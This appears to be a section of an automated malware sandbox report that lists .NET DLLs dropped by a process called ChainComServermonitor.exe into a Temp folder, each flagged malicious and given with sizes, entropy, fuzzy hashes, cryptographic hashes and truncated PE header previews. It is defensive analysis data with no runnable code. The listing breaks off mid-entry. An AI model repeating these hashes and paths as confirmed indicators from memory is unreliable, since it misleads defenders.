                                                                                                                                                                              SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):64000
                                                                                                                                                                              Entropy (8bit):5.857602289000348
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                                                                                              MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                                                                                              SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                                                                                              SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                                                                                              SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):38400
                                                                                                                                                                              Entropy (8bit):5.699005826018714
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                                                                                              MD5:87765D141228784AE91334BAE25AD743
                                                                                                                                                                              SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                                                                                              SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                                                                                              SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):41472
                                                                                                                                                                              Entropy (8bit):5.6808219961645605
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                                                                                                              MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                                                                                                              SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                                                                                                              SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                                                                                                              SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                              Entropy (8bit):5.645950918301459
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                              MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                              SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                              SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                              SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):32256
                                                                                                                                                                              Entropy (8bit):5.631194486392901
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                              MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                              SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                              SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                              SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):39936
                                                                                                                                                                              Entropy (8bit):5.660491370279985
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                                                                              MD5:240E98D38E0B679F055470167D247022
                                                                                                                                                                              SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                                                                              SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                                                                              SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):70144
                                                                                                                                                                              Entropy (8bit):5.909536568846014
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                                                                                              MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                                                                                              SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                                                                                              SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                                                                                              SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):69632
                                                                                                                                                                              Entropy (8bit):5.932541123129161
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                              MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                              SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                              SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                              SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):36352
                                                                                                                                                                              Entropy (8bit):5.668291349855899
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                                                                                              MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                                                                                              SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                                                                                              SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                                                                                              SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):33792
                                                                                                                                                                              Entropy (8bit):5.541771649974822
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                                                                              MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                                                                              SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                                                                              SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                                                                              SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):34304
                                                                                                                                                                              Entropy (8bit):5.618776214605176
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                                                                                              MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                                                                                              SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                                                                                              SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                                                                                              SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):38912
                                                                                                                                                                              Entropy (8bit):5.679286635687991
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                                                                              MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                                                                              SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                                                                              SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                                                                              SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):50176
                                                                                                                                                                              Entropy (8bit):5.723168999026349
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                                                                                                                              MD5:2E116FC64103D0F0CF47890FD571561E
                                                                                                                                                                              SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                                                                                                                              SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                                                                                                                              SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):40448
                                                                                                                                                                              Entropy (8bit):5.7028690200758465
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                                                                                                              MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                                                                                                              SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                                                                                                              SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                                                                                                              SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):46592
                                                                                                                                                                              Entropy (8bit):5.870612048031897
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                                                                                              MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                                                                                              SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                                                                                              SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                                                                                              SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):294912
                                                                                                                                                                              Entropy (8bit):6.010605469502259
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                                                                              MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                                                                              SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                                                                              SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                                                                              SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):126976
                                                                                                                                                                              Entropy (8bit):6.057993947082715
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                                                                              MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                                                                              SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                                                                              SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                                                                              SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):39936
                                                                                                                                                                              Entropy (8bit):5.629584586954759
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                                                                              MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                                                                              SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                                                                              SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                                                                              SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):34816
                                                                                                                                                                              Entropy (8bit):5.636032516496583
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                                                                              MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                                                                              SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                                                                              SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
